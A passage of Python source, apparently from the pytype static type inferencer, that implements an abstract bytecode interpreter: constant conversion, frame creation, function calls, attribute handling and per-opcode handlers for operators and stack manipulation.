if key not in self._convert_cache:
self._convert_cache[key] = self.construct_constant_from_value(name, pyval)
return self._convert_cache[key]
def construct_constant_from_value(self, name, pyval):
"""Create a AtomicAbstractValue that represents a python constant.
This supports both constant from code constant pools and PyTD constants such
as classes. This also supports built-in python objects such as int and
float.
Args:
name: The name of this constant. Used for naming its attribute variables.
pyval: The python or PyTD value to convert.
Returns:
A Value that represents the constant, or None if we couldn't convert.
Raises:
NotImplementedError: If we don't know how to convert a value.
"""
if pyval is type:
return abstract.SimpleAbstractValue(name, self)
elif isinstance(pyval, str):
return abstract.AbstractOrConcreteValue(pyval, self.str_type, self)
elif isinstance(pyval, int) and -1 <= pyval <= MAX_IMPORT_DEPTH:
# For small integers, preserve the actual value (for things like the
# level in IMPORT_NAME).
return abstract.AbstractOrConcreteValue(pyval, self.int_type, self)
elif pyval.__class__ in self.primitive_classes:
return self.primitive_class_instances[pyval.__class__]
elif isinstance(pyval, (loadmarshal.CodeType, blocks.OrderedCode)):
return abstract.AbstractOrConcreteValue(
pyval, self.primitive_classes[types.CodeType], self)
elif pyval.__class__ in [types.FunctionType, types.ModuleType, type]:
try:
# TODO(ampere): This will incorrectly handle any object that is named
# the same as a builtin but is distinct. It will need to be extended to
# support imports and the like.
pyclass = self.loader.builtins.Lookup(pyval.__name__)
return self.convert_constant_to_value(name, pyclass)
except (KeyError, AttributeError):
log.debug("Failed to find pytd", exc_info=True)
raise
elif isinstance(pyval, pytd.Class):
return abstract.PyTDClass(name, pyval, self)
elif isinstance(pyval, pytd.Function):
f = abstract.PyTDFunction(pyval.name, [abstract.PyTDSignature(sig, self)
for sig in pyval.signatures], self)
return f
elif isinstance(pyval, pytd.ExternalType): # needs to be before ClassType
assert pyval.cls
return self.convert_constant_to_value(str(pyval), pyval.cls)
elif isinstance(pyval, pytd.ClassType): # needs to be after ExternalType
assert pyval.cls
return self.convert_constant_to_value(pyval.name, pyval.cls)
elif isinstance(pyval, pytd.NothingType):
return self.nothing
elif isinstance(pyval, pytd.AnythingType):
return self._create_new_unknown_value("AnythingType")
elif isinstance(pyval, pytd.UnionType):
return abstract.Union([self.convert_constant_to_value(pytd.Print(t), t)
for t in pyval.type_list], self)
elif isinstance(pyval, pytd.TypeParameter):
return abstract.TypeParameter(pyval.name, self)
elif isinstance(pyval, pytd.GenericType):
# TODO(kramm): Remove ParameterizedClass. This should just create a
# SimpleAbstractValue with type parameters.
assert isinstance(pyval.base_type, pytd.ClassType)
type_parameters = {
param.name: self.convert_constant_to_value(param.name, value)
for param, value in zip(pyval.base_type.cls.template,
pyval.parameters)
}
cls = self.convert_constant_to_value(pytd.Print(pyval.base_type),
pyval.base_type.cls)
return abstract.ParameterizedClass(cls, type_parameters, self)
elif pyval.__class__ is tuple: # only match raw tuple, not namedtuple/Node
return self.tuple_to_value(self.root_cfg_node,
[self.convert_constant("tuple[%d]" % i, item)
for i, item in enumerate(pyval)])
else:
raise NotImplementedError("Can't convert constant %s %r" %
(type(pyval), pyval))
def maybe_convert_constant(self, name, pyval):
"""Create a variable that represents a python constant if needed.
Call self.convert_constant if pyval is not an AtomicAbstractValue, otherwise
store said value in a variable. This also handles dict values by
constructing a new abstract value representing it. Dict values are not
cached.
Args:
name: The name to give to the variable.
pyval: The python value or PyTD value to convert or pass
through.
Returns:
A Variable.
"""
assert not isinstance(pyval, typegraph.Variable)
if isinstance(pyval, abstract.AtomicAbstractValue):
return pyval.to_variable(self.root_cfg_node, name)
elif isinstance(pyval, dict):
value = abstract.LazyAbstractOrConcreteValue(
name,
pyval, # for class members
member_map=pyval,
resolver=self.maybe_convert_constant,
vm=self)
value.set_attribute(self.root_cfg_node, "__class__", self.dict_type)
return value.to_variable(self.root_cfg_node, name)
else:
return self.convert_constant(name, pyval)
def make_none(self, node):
none = self.none.to_variable(node, "None")
assert self.is_none(none)
return none
def make_class(self, node, name_var, bases, class_dict_var):
"""Create a class with the name, bases and methods given.
Args:
node: The current CFG node.
name_var: Class name.
bases: Base classes.
class_dict_var: Members of the class, as a Variable containing an
abstract.Dict value.
Returns:
An instance of Class.
"""
name = _get_atomic_python_constant(name_var)
log.info("Declaring class %s", name)
try:
class_dict = _get_atomic_value(class_dict_var)
except ConversionError:
log.error("Error initializing class %r", name)
return self.create_new_unknown(node, name)
val = abstract.InterpreterClass(
name,
list(_get_atomic_python_constant(bases)),
class_dict.members,
self)
var = self.program.NewVariable(name)
var.AddValue(val, bases.values + class_dict_var.values, node)
return var
def make_function(self, name, code, globs, defaults, closure=None):
"""Create a function or closure given the arguments."""
if closure:
closure = tuple(c for c in _get_atomic_python_constant(closure))
log.info("closure: %r", closure)
if not name:
if _get_atomic_python_constant(code).co_name:
name = "<function:%s>" % _get_atomic_python_constant(code).co_name
else:
name = "<lambda>"
val = abstract.InterpreterFunction.make_function(
name, code=_get_atomic_python_constant(code),
f_locals=self.frame.f_locals, f_globals=globs,
defaults=defaults, closure=closure, vm=self)
# TODO(ampere): What else needs to be an origin in this case? Probably stuff
# in closure.
var = self.program.NewVariable(name)
var.AddValue(val, code.values, self.root_cfg_node)
return var
def make_frame(self, node, code, callargs=None,
f_globals=None, f_locals=None, closure=None):
"""Create a new frame object, using the given args, globals and locals."""
if any(code is f.f_code for f in self.frames):
log.info("Detected recursion in %s", code.co_name or code.co_filename)
raise RecursionException()
log.info("make_frame: callargs=%s, f_globals=[%s@%x], f_locals=[%s@%x]",
self.repper(callargs),
type(f_globals).__name__, id(f_globals),
type(f_locals).__name__, id(f_locals))
if f_globals is not None:
f_globals = f_globals
assert f_locals
else:
assert not self.frames
assert f_locals is None
# TODO(ampere): __name__, __doc__, __package__ below are not correct
f_globals = f_locals = self.convert_locals_or_globals({
"__builtins__": self.vmbuiltins,
"__name__": "__main__",
"__doc__": None,
"__package__": None,
})
# Implement NEWLOCALS flag. See Objects/frameobject.c in CPython.
if code.co_flags & loadmarshal.CodeType.CO_NEWLOCALS:
f_locals = self.convert_locals_or_globals({}, "locals")
return frame_state.Frame(node, self, code, f_globals, f_locals,
self.frame, callargs or {}, closure)
def is_none(self, value):
"""Checks whether a value is considered to be "None".
Important for stack values, which might be a symbolic None.
Arguments:
value: A typegraph.Variable.
Returns:
Whether the value is None. False if it isn't or if we don't know.
"""
try:
return value is None or _get_atomic_python_constant(value) is None
except ConversionError:
return False
def push_abstract_exception(self, state):
tb = self.program.NewVariable("tb", [], [], state.node)
value = self.program.NewVariable("value", [], [], state.node)
exctype = self.program.NewVariable("exctype", [], [], state.node)
return state.push(tb, value, exctype)
def resume_frame(self, frame):
# TODO(kramm): The concrete interpreter did this:
# frame.f_back = self.frame
# log.info("resume_frame: %r", frame)
# val = self.run_frame(frame)
# frame.f_back = None
# return val
raise StopIteration()
def backtrace(self):
items = []
for f in self.frames:
block = self.cfg.get_basic_block(f.f_code, f.f_lasti)
if block in f.cfgnode:
cfg_node = f.cfgnode[block]
items.append("[%d %s]" % (cfg_node.id, cfg_node.name))
else:
items.append("{%s}" % block.get_name())
return " ".join(items)
def compile_src(self, src, filename=None):
code = pyc.compile_src(
src, python_version=self.python_version, filename=filename)
return blocks.process_code(code)
def run_bytecode(self, node, code, f_globals=None, f_locals=None):
frame = self.make_frame(node, code, f_globals=f_globals, f_locals=f_locals)
node, _ = self.run_frame(frame, node)
if self.frames: # pragma: no cover
raise VirtualMachineError("Frames left over!")
if self.frame is not None and self.frame.data_stack: # pragma: no cover
raise VirtualMachineError("Data left on stack!")
return node, frame.f_globals, frame.f_locals
def preload_builtins(self, node):
"""Parse __builtin__.py and return the definitions as a globals dict."""
if self.pybuiltins_filename:
with open(self.pybuiltins_filename, "rb") as fi:
src = fi.read()
else:
src = builtins.GetBuiltinsCode(self.python_version)
builtins_code = self.compile_src(src)
node, f_globals, f_locals = self.run_bytecode(node, builtins_code)
# at the outer layer, locals are the same as globals
builtin_names = frozenset(f_globals.members)
return node, f_globals, f_locals, builtin_names
def run_program(self, src, filename=None, run_builtins=True):
"""Run the code and return the CFG nodes.
This function loads in the builtins and puts them ahead of `code`,
so all the builtins are available when processing `code`.
Args:
src: The program source code.
filename: The filename the source is from.
run_builtins: Whether to preload the native Python builtins.
Returns:
A tuple (CFGNode, set) containing the last CFGNode of the program as
well as all the top-level names defined by it.
"""
node = self.root_cfg_node.ConnectNew("builtins")
if run_builtins:
node, f_globals, f_locals, builtin_names = self.preload_builtins(node)
else:
node, f_globals, f_locals, builtin_names = node, None, None, frozenset()
code = self.compile_src(src, filename=filename)
node = node.ConnectNew("init")
node, f_globals, _ = self.run_bytecode(node, code, f_globals, f_locals)
log.info("Final node: <%d>%s", node.id, node.name)
return node, f_globals.members, builtin_names
def call_binary_operator(self, state, name, x, y):
"""Map a binary operator to "magic methods" (__add__ etc.)."""
# TODO(pludemann): See TODO.txt for more on reverse operator subtleties.
results = []
log.debug("Calling binary operator %s", name)
try:
state, attr = self.load_attr(state, x, name)
except exceptions.ByteCodeAttributeError: # from load_attr
log.info("Failed to find %s on %r", name, x, exc_info=True)
else:
state, ret = self.call_function_with_state(state, attr, [y],
fallback_to_unsolvable=False)
results.append(ret)
rname = self.reverse_operator_name(name)
if self.reverse_operators and rname:
try:
state, attr = self.load_attr(state, y, rname)
except exceptions.ByteCodeAttributeError:
log.debug("No reverse operator %s on %r",
self.reverse_operator_name(name), y)
else:
state, ret = self.call_function_with_state(state, attr, [x],
fallback_to_unsolvable=False)
results.append(ret)
log.debug("Results: %r", results)
return state, self.join_variables(state.node, name, results)
def binary_operator(self, state, name):
state, (x, y) = state.popn(2)
state, ret = self.call_binary_operator(state, name, x, y)
return state.push(ret)
def inplace_operator(self, state, name):
state, (x, y) = state.popn(2)
state, ret = self.call_binary_operator(state, name, x, y)
return state.push(ret)
def trace_unknown(self, *args):
"""Fired whenever we create a variable containing 'Unknown'."""
return NotImplemented
def trace_call(self, *args):
"""Fired whenever we call a builtin using unknown parameters."""
return NotImplemented
def call_function_with_state(self, state, funcu, posargs, namedargs=None,
starargs=None, fallback_to_unsolvable=True):
node, ret = self.call_function(
state.node, funcu, posargs, namedargs, starargs, fallback_to_unsolvable)
return state.change_cfg_node(node), ret
def call_function(self, node, funcu, posargs, namedargs=None,
starargs=None, fallback_to_unsolvable=True):
"""Call a function.
Args:
node: The current CFG node.
funcu: A variable of the possible functions to call.
posargs: The known positional arguments to pass (as variables).
namedargs: The known keyword arguments to pass. dict of str -> Variable.
starargs: The contents of the *args parameter, if passed. (None otherwise)
fallback_to_unsolvable: If the function call fails, create an unknown.
Returns:
A tuple (CFGNode, Variable). The Variable is the return value.
"""
assert funcu.values
result = self.program.NewVariable("<return:%s>" % funcu.name)
nodes = []
error = None
for funcv in funcu.values:
func = funcv.data
assert isinstance(func, abstract.AtomicAbstractValue), type(func)
try:
new_node, one_result = func.call(
node, funcv, posargs, namedargs or {}, starargs)
except abstract.FailedFunctionCall as e:
error = error or e
else:
result.PasteVariable(one_result, new_node)
nodes.append(new_node)
if nodes:
return self.join_cfg_nodes(nodes), result
else:
if fallback_to_unsolvable:
assert error
log.error("FailedFunctionCall for %s", error.obj)
for msg in error.explanation_lines:
log.error("... %s", msg)
return node, self.create_new_unsolvable(node, "failed call")
else:
# We were called by something that returns errors, so don't report
# the failed call.
return node, result
def call_function_from_stack(self, state, arg, args, kwargs=None):
"""Pop arguments for a function and call it."""
num_kw, num_pos = divmod(arg, 256)
# TODO(kramm): Can we omit creating this dict if kwargs=None and num_kw=0?
namedargs = abstract.Dict("kwargs", self)
for _ in range(num_kw):
state, (key, val) = state.popn(2)
namedargs.setitem(state.node, key, val)
if kwargs:
for v in kwargs.data:
namedargs.update(state.node, v)
state, posargs = state.popn(num_pos)
posargs = list(posargs)
posargs.extend(args)
state, func = state.pop()
state, ret = self.call_function_with_state(state, func, posargs, namedargs)
state = state.push(ret)
return state
def load_constant(self, value):
"""Converts a Python value to an abstract value."""
return self.convert_constant(type(value).__name__, value)
def get_globals_dict(self):
"""Get a real python dict of the globals."""
return self.frame.f_globals
def load_from(self, state, store, name):
node = state.node
node, exists = store.has_attribute(node, name)
assert isinstance(node, typegraph.CFGNode)
if not exists:
raise KeyError(name)
node, attr = store.get_attribute(node, name)
assert isinstance(node, typegraph.CFGNode)
state = state.change_cfg_node(node)
return state, attr
def load_local(self, state, name):
"""Called when a local is loaded onto the stack.
Uses the name to retrieve the value from the current locals().
Args:
state: The current VM state.
name: Name of the local
Returns:
The value (typegraph.Variable)
"""
return self.load_from(state, self.frame.f_locals, name)
def load_global(self, state, name):
return self.load_from(state, self.frame.f_globals, name)
def load_builtin(self, state, name):
if name == "__any_object__":
# for type_inferencer/tests/test_pgms/*.py
return state, abstract.Unknown(self).to_variable(state.node, name)
return self.load_from(state, self.frame.f_builtins, name)
def store_local(self, state, name, value):
"""Called when a local is written."""
assert isinstance(value, typegraph.Variable), (name, repr(value))
node = self.frame.f_locals.set_attribute(state.node, name, value)
return state.change_cfg_node(node)
def store_global(self, state, name, value):
"""Same as store_local except for globals."""
assert isinstance(value, typegraph.Variable)
node = self.frame.f_globals.set_attribute(state.node, name, value)
return state.change_cfg_node(node)
def del_local(self, name):
"""Called when a local is deleted."""
# TODO(ampere): Implement locals removal or decide not to.
log.warning("Local variable removal does not actually do "
"anything in the abstract interpreter")
def get_attr(self, node, obj, attr, allow_descriptors=True):
"""Load an attribute from an object."""
assert isinstance(obj, typegraph.Variable), obj
# Resolve the value independently for each value of obj
result = self.program.NewVariable(str(attr))
log.debug("getting attr %s from %r", attr, obj)
nodes = []
for val in obj.Values(node):
node2, exists = val.data.has_attribute(node, attr, val)
if not exists:
log.debug("No %s on %s", attr, val.data.__class__)
continue
node2, attr_var = val.data.get_attribute(node2, attr, val)
log.debug("got choice for attr %s from %r of %r (0x%x): %r", attr, obj,
val.data, id(val.data), attr_var)
if not attr_var:
continue
# Loop over the values to check for properties
if allow_descriptors:
# TODO(kramm): Descriptor logic should go into abstract.Class.
for v in attr_var.Values(node2):
value = v.data
node3, has_getter = value.has_attribute(node2, "__get__")
if has_getter:
node3, getter = value.get_attribute(node2, "__get__", v)
node3, get_result = self.call_function(
node3, getter, [getter, value.get_class()])
for getter in get_result.values:
result.AddValue(getter.data, [getter], node3)
else:
result.AddValue(value, [v], node3)
nodes.append(node3)
else:
result.PasteVariable(attr_var, node2)
nodes.append(node2)
if not result.values:
raise exceptions.ByteCodeAttributeError("No such attribute %s" % attr)
return self.join_cfg_nodes(nodes), result
def load_attr(self, state, obj, attr, allow_descriptors=True):
node, result = self.get_attr(state.node, obj, attr, allow_descriptors)
return state.change_cfg_node(node), result
def store_attr(self, state, obj, attr, value):
"""Same as load_attr except for setting attributes."""
assert isinstance(obj, typegraph.Variable)
assert isinstance(attr, str)
assert isinstance(value, typegraph.Variable)
nodes = []
for val in obj.values:
# TODO(kramm): Check whether val.data is a descriptor (i.e. has "__set__")
nodes.append(val.data.set_attribute(state.node, attr, value))
return state.change_cfg_node(
self.join_cfg_nodes(nodes))
def del_attr(self, state, obj, attr):
"""Same as load_attr except for deleting attributes."""
# TODO(kramm): Store abstract.Nothing
log.warning("Attribute removal does not actually do "
"anything in the abstract interpreter")
return state
def build_bool(self, node, value=None):
if value is None:
name, val = "bool", self.primitive_class_instances[bool]
elif value is True:
name, val = "True", self.true_value
elif value is False:
name, val = "False", self.false_value
else:
raise ValueError("Invalid bool value: %r", value)
return val.to_variable(node, name)
def build_string(self, node, s):
return self.convert_constant(repr(s), s)
def build_content(self, node, elements):
var = self.program.NewVariable("<elements>")
for v in elements:
var.PasteVariable(v, node)
return var
def build_slice(self, node, start, stop, step=None):
return self.primitive_class_instances[slice].to_variable(node, "slice")
def tuple_to_value(self, node, content):
"""Create a VM tuple from the given sequence."""
content = tuple(content) # content might be a generator
value = abstract.AbstractOrConcreteValue(
content, self.tuple_type, self)
value.initialize_type_parameter(node, "T",
self.build_content(node, content))
return value
def build_tuple(self, node, content):
"""Create a VM tuple from the given sequence."""
return self.tuple_to_value(node, content).to_variable(node, name="tuple")
def build_list(self, node, content):
"""Create a VM list from the given sequence."""
content = list(content) # content might be a generator
value = abstract.Instance(self.list_type, self)
value.initialize_type_parameter(node, "T",
self.build_content(node, content))
return value.to_variable(node, name="list(...)")
def build_set(self, node, content):
"""Create a VM set from the given sequence."""
content = list(content) # content might be a generator
value = abstract.Instance(self.set_type, self)
value.initialize_type_parameter(node, "T",
self.build_content(node, content))
return value.to_variable(node, name="set(...)")
def build_map(self, node):
"""Create an empty VM dict."""
return abstract.Dict("dict()", self).to_variable(node, "dict()")
def push_last_exception(self, state):
log.info("Pushing exception %r", state.exception)
exctype, value, tb = state.exception
return state.push(tb, value, exctype)
def del_subscr(self, state, obj, subscr):
log.warning("Subscript removal does not actually do "
"anything in the abstract interpreter")
# TODO(kramm): store abstract.Nothing
return state
def pop_varargs(self, state):
"""Retrieve a varargs tuple from the stack. Used by call_function."""
state, args_var = state.pop()
try:
args = _get_atomic_python_constant(args_var)
if not isinstance(args, tuple):
raise ConversionError(type(args))
except ConversionError:
# If the *args parameter is non-trivial, just try calling with no
# arguments.
# TODO(kramm): When calling a method, we should instead insert Unknown for
# all parameters that are not otherwise set.
log.error("Unable to resolve positional arguments: *%s", args_var.name)
args = []
return state, args
def pop_kwargs(self, state):
"""Retrieve a kwargs dictionary from the stack. Used by call_function."""
return state.pop()
def convert_locals_or_globals(self, d, name="globals"):
return abstract.LazyAbstractValue(
name, d, self.maybe_convert_constant, self)
# TODO(kramm): memoize
def import_module(self, name, level):
"""Import the module and return the module object."""
if name:
assert level <= 0
ast = self.loader.import_name(name)
else:
assert level > 0
ast = self.loader.import_relative(level)
if ast:
members = {val.name.rsplit(".")[-1]: val
for val in ast.constants + ast.classes + ast.functions}
return abstract.Module(self, ast.name, members)
else:
return None
def print_item(self, item, to=None):
# We don't need do anything here, since Python's print function accepts
# any type. (We could exercise the __str__ method on item - but every
# object has a __str__, so we wouldn't learn anything from that.)
pass
def print_newline(self, to=None):
pass
def unary_operator(self, state, name):
state, x = state.pop()
state, method = self.load_attr(state, x, name) # E.g. __not__
state, result = self.call_function_with_state(state, method, [], {})
state = state.push(result)
return state
def byte_UNARY_NOT(self, state):
state = state.pop_and_discard()
state = state.push(self.build_bool(state.node))
return state
def byte_UNARY_CONVERT(self, state):
return self.unary_operator(state, "__repr__")
def byte_UNARY_NEGATIVE(self, state):
return self.unary_operator(state, "__neg__")
def byte_UNARY_POSITIVE(self, state):
return self.unary_operator(state, "__pos__")
def byte_UNARY_INVERT(self, state):
return self.unary_operator(state, "__invert__")
def byte_BINARY_ADD(self, state):
return self.binary_operator(state, "__add__")
def byte_BINARY_SUBTRACT(self, state):
return self.binary_operator(state, "__sub__")
def byte_BINARY_DIVIDE(self, state):
return self.binary_operator(state, "__div__")
def byte_BINARY_MULTIPLY(self, state):
return self.binary_operator(state, "__mul__")
def byte_BINARY_MODULO(self, state):
return self.binary_operator(state, "__mod__")
def byte_BINARY_LSHIFT(self, state):
return self.binary_operator(state, "__lshift__")
def byte_BINARY_RSHIFT(self, state):
return self.binary_operator(state, "__rshift__")
def byte_BINARY_AND(self, state):
return self.binary_operator(state, "__and__")
def byte_BINARY_XOR(self, state):
return self.binary_operator(state, "__xor__")
def byte_BINARY_OR(self, state):
return self.binary_operator(state, "__or__")
def byte_BINARY_FLOOR_DIVIDE(self, state):
return self.binary_operator(state, "__floordiv__")
def byte_BINARY_TRUE_DIVIDE(self, state):
return self.binary_operator(state, "__truediv__")
def byte_BINARY_POWER(self, state):
return self.binary_operator(state, "__pow__")
def byte_BINARY_SUBSCR(self, state):
state = self.binary_operator(state, "__getitem__")
if state.top().values:
return state
else:
raise exceptions.ByteCodeIndexError(
"Couldn't retrieve item out of container")
def byte_INPLACE_ADD(self, state):
return self.binary_operator(state, "__iadd__")
def byte_INPLACE_SUBTRACT(self, state):
return self.inplace_operator(state, "__isub__")
def byte_INPLACE_MULTIPLY(self, state):
return self.inplace_operator(state, "__imul__")
def byte_INPLACE_DIVIDE(self, state):
return self.inplace_operator(state, "__idiv__")
def byte_INPLACE_MODULO(self, state):
return self.inplace_operator(state, "__imod__")
def byte_INPLACE_POWER(self, state):
return self.inplace_operator(state, "__ipow__")
def byte_INPLACE_LSHIFT(self, state):
return self.inplace_operator(state, "__ilshift__")
def byte_INPLACE_RSHIFT(self, state):
return self.inplace_operator(state, "__irshift__")
def byte_INPLACE_AND(self, state):
return self.inplace_operator(state, "__iand__")
def byte_INPLACE_XOR(self, state):
return self.inplace_operator(state, "__ixor__")
def byte_INPLACE_OR(self, state):
return self.inplace_operator(state, "__ior__")
def byte_INPLACE_FLOOR_DIVIDE(self, state):
return self.inplace_operator(state, "__ifloordiv__")
def byte_INPLACE_TRUE_DIVIDE(self, state):
return self.inplace_operator(state, "__itruediv__")
def byte_LOAD_CONST(self, state, op):
const = self.frame.f_code.co_consts[op.arg]
return state.push(self.load_constant(const))
def byte_POP_TOP(self, state):
return state.pop_and_discard()
def byte_DUP_TOP(self, state):
return state.push(state.top())
def byte_DUP_TOPX(self, state, op):
state, items = state.popn(op.arg)
state = state.push(*items)
state = state.push(*items)
return state
def byte_DUP_TOP_TWO(self, state):
# Py3 only
state, (a, b) = state.popn(2)
return state.push(a, b, a, b)
def byte_ROT_TWO(self, state):
state, (a, b) = state.popn(2)
return state.push(b, a)
def byte_ROT_THREE(self, state):
state, (a, b, c) = state.popn(3)
return state.push(c, a, b)
def byte_ROT_FOUR(self, state):
state, (a, b, c, d) = state.popn(4)
return state.push(d, a, b, c)
def byte_LOAD_NAME(self, state, op):
"""Load a name. Can be a local, global, or builtin."""
name = self.frame.f_code.co_names[op.arg]
try:
state, val = self.load_local(state, name)
except KeyError:
try:
state, val = self.load_global(state, name)
except KeyError:
try:
state, val = self.load_builtin(state, name)
except KeyError:
raise exceptions.ByteCodeNameError("name '%s' is not defined" % name)
return state.push(val)
def byte_STORE_NAME(self, state, op):
name = self.frame.f_code.co_names[op.arg]
state, value = state.pop()
state = self.store_local(state, name, value)
return state
def byte_DELETE_NAME(self, state, op):
name = self.frame.f_code.co_names[op.arg]
self.del_local(name)
return state
def byte_LOAD_FAST(self, state, op):
"""Load a local. Unlike LOAD_NAME, it doesn't fall back to globals."""
name = self.frame.f_code.co_varnames[op.arg]
try:
state, val = self.load_local(state, name)
except KeyError:
raise exceptions.ByteCodeUnboundLocalError(
"local variable '%s' referenced before assignment" % name
)
return state.push(val)
def byte_STORE_FAST(self, state, op):
name = self.frame.f_code.co_varnames[op.arg]
state, value = state.pop()
state = state.forward_cfg_node()
state = self.store_local(state, name, value)
return state
def byte_DELETE_FAST(self, state, op):
name = self.frame.f_code.co_varnames[op.arg]
self.del_local(name)
return state
def byte_LOAD_GLOBAL(self, state, op):
"""Load a global variable, or fall back to trying to load a builtin."""
name = self.frame.f_code.co_names[op.arg]
try:
state, val = self.load_global(state, name)
except KeyError:
try:
state, val = self.load_builtin(state, name)
except KeyError:
raise exceptions.ByteCodeNameError(
"global name '%s' is not defined" % name)
return state.push(val)
def byte_STORE_GLOBAL(self, state, op):
name = self.frame.f_code.co_names[op.arg]
state, value = state.pop()
state = self.store_global(state, name, value)
return state
def byte_LOAD_CLOSURE(self, state, op):
"""Used to generate the 'closure' tuple for MAKE_CLOSURE.
Each entry in that tuple is typically retrieved using LOAD_CLOSURE.
Args:
state: The current VM state.
op: The opcode. op.arg is the index of a "cell variable": This corresponds
to an entry in co_cellvars or co_freevars and is a variable that's bound
into a closure.
Returns:
A new state.
"""
return state.push(self.frame.cells[op.arg])
def byte_LOAD_DEREF(self, state, op):
"""Retrieves a value out of a cell."""
# Since we're working on typegraph.Variable, we don't need to dereference.
return state.push(self.frame.cells[op.arg])
def byte_STORE_DEREF(self, state, op):
"""Stores a value in a closure cell."""
state, value = state.pop()
assert isinstance(value, typegraph.Variable)
self.frame.cells[op.arg].PasteVariable(value, state.node)
return state
def byte_LOAD_LOCALS(self, state):
log.debug("Returning locals: %r", self.frame.f_locals)
locals_dict = self.maybe_convert_constant("locals", self.frame.f_locals)
return state.push(locals_dict)
def byte_COMPARE_OP(self, state, op):
"""Pops and compares the top two stack values and pushes a boolean."""
state, (x, y) = state.popn(2)
# Explicit, redundant, switch statement, to make it easier to address the
# behavior of individual compare operations:
if op.arg == slots.CMP_LT:
state, ret = self.call_binary_operator(state, "__lt__", x, y)
elif op.arg == slots.CMP_LE:
state, ret = self.call_binary_operator(state, "__le__", x, y)
elif op.arg == slots.CMP_EQ:
state, ret = self.call_binary_operator(state, "__eq__", x, y)
elif op.arg == slots.CMP_NE:
state, ret = self.call_binary_operator(state, "__ne__", x, y)
elif op.arg == slots.CMP_GT:
state, ret = self.call_binary_operator(state, "__gt__", x, y)
elif op.arg == slots.CMP_GE:
state, ret = self.call_binary_operator(state, "__ge__", x, y)
elif op.arg == slots.CMP_IS:
ret = self.build_bool(state.node)
elif op.arg == slots.CMP_IS_NOT:
ret = self.build_bool(state.node)
elif op.arg == slots.CMP_NOT_IN:
ret = self.build_bool(state.node)
elif op.arg == slots.CMP_IN:
ret = self.build_bool(state.node)
elif op.arg == slots.CMP_EXC_MATCH:
ret = self.build_bool(state.node)
else:
raise VirtualMachineError("Invalid argument to COMPARE_OP: %d", op.arg)
return state.push(ret)
def byte_LOAD_ATTR(self, state, op):
"""Pop an object, and retrieve a named attribute from it."""
name = self.frame.f_code.co_names[op.arg]
state, obj = state.pop()
log.info("LOAD_ATTR: %r %s", type(obj), name)
try:
state, val = self.load_attr(state, obj, name)
except exceptions.ByteCodeAttributeError:
log.error("No such attribute %s", name)
state = state.push(self.create_new_unsolvable(state.node, "bad attr"))
else:
state = state.push(val)
return state
def byte_STORE_ATTR(self, state, op):
name = self.frame.f_code.co_names[op.arg]
state, (val, obj) = state.popn(2)
state = state.forward_cfg_node()
state = self.store_attr(state, obj, name, val)
return state
def byte_DELETE_ATTR(self, state, op):
name = self.frame.f_code.co_names[op.arg]
state, obj = state.pop()
return self.del_attr(state, obj, name)
def store_subscr(self, state, obj, key, val):
state, f = self.load_attr(state, obj, "__setitem__")
state, _ = self.call_function_with_state(state, f, [key, val], {})
return state
def byte_STORE_SUBSCR(self, state):
state, (val, obj, subscr) = state.popn(3)
state = state.forward_cfg_node()
state = self.store_subscr(state, obj, subscr, val)
return state
def byte_DELETE_SUBSCR(self, state):
state, (obj, subscr) = state.popn(2)
return self.del_subscr(state, obj, subscr)
def byte_BUILD_TUPLE(self, state, op):
count = op.arg
state, elts = state.popn(count)
return state.push(self.build_tuple(state.node, elts))
def byte_BUILD_LIST(self, state, op):
count = op.arg
state, elts = state.popn(count)
return state.push(self.build_list(state.node, elts))
def byte_BUILD_SET(self, state, op):
count = op.arg
state, elts = state.popn(count)
return state.push(self.build_set(state.node, elts))
def byte_BUILD_MAP(self, state, op):
# op.arg (size) is ignored.
return state.push(self.build_map(state.node))
def byte_STORE_MAP(self, state):
state, (the_map, val, key) = state.popn(3)
state = self.store_subscr(state, the_map, key, val)
return state.push(the_map)
def byte_UNPACK_SEQUENCE(self, state, op):
"""Pops a tuple (or other iterable) and pushes it onto the VM's stack."""
state, seq = state.pop()
state, f = self.load_attr(state, seq, "__iter__")
state, itr = self.call_function_with_state(state, f, [], {})
values = []
for _ in range(op.arg):
# TODO(ampere): Fix for python 3
state, f = self.load_attr(state, itr, "next")
state, result = self.call_function_with_state(state, f, [], {})
values.append(result)
for value in reversed(values):
state = state.push(value)
return state
def byte_BUILD_SLICE(self, state, op):
if op.arg == 2:
state, (x, y) = state.popn(2)
return state.push(self.build_slice(state.node, x, y))
elif op.arg == 3:
state, (x, y, z) = state.popn(3)
return state.push(self.build_slice(state.node, x, y, z))
else: # pragma: no cover
raise VirtualMachineError("Strange BUILD_SLICE count: %r" % op.arg)
def byte_LIST_APPEND(self, state, op):
# Used by the compiler e.g. for [x for x in ...]
count = op.arg
state, val = state.pop()
the_list = state.peek(count)
state, f = self.load_attr(state, the_list, "append")
state, _ = self.call_function_with_state(state, f, [val], {})
return state
def byte_SET_ADD(self, state, op):
# Used by the compiler e.g. for {x for x in ...}
count = op.arg
state, val = state.pop()
the_set = state.peek(count)
state, f = self.load_attr(state, the_set, "add")
state, _ = self.call_function_with_state(state, f, [val], {})
return state
def byte_MAP_ADD(self, state, op):
# Used by the compiler e.g. for {x, y for x, y in ...}
count = op.arg
state, (val, key) = state.popn(2)
the_map = state.peek(count)
state, f = self.load_attr(state, the_map, "__setitem__")
state, _ = self.call_function_with_state(state, f, [key, val], {})
return state
def byte_PRINT_EXPR(self, state):
# Only used in the interactive interpreter, not in modules.
return state.pop_and_discard()
def byte_PRINT_ITEM(self, state):
state, item = state.pop()
self.print_item(item)
return state
def byte_PRINT_ITEM_TO(self, state):
state, to = state.pop()
state, item = state.pop()
self.print_item(item, to)
return state
def byte_PRINT_NEWLINE(self, state):
self.print_newline()
return state
def byte_PRINT_NEWLINE_TO(self, state):
state, to = state.pop()
self.print_newline(to)
return state
def byte_JUMP_IF_TRUE_OR_POP(self, state, op):
self.store_jump(op.target, state.forward_cfg_node())
return state.pop_and_discard()
def byte_JUMP_IF_FALSE_OR_POP(self, state, op):
self.store_jump(op.target, state.forward_cfg_node())
return state.pop_and_discard()
def byte_JUMP_IF_TRUE(self, state, op): # Not in py2.7
self.store_jump(op.target, state.forward_cfg_node())
return state
def byte_JUMP_IF_FALSE(self, state, op): # Not in py2.7
self.store_jump(op.target, state.forward_cfg_node())
return state
def byte_POP_JUMP_IF_TRUE(self, state, op):
state, unused_val = state.pop()
self.store_jump(op.target, state.forward_cfg_node())
return state
def byte_POP_JUMP_IF_FALSE(self, state, op):
state, unused_val = state.pop()
self.store_jump(op.target, state.forward_cfg_node())
return state
def byte_JUMP_FORWARD(self, state, op):
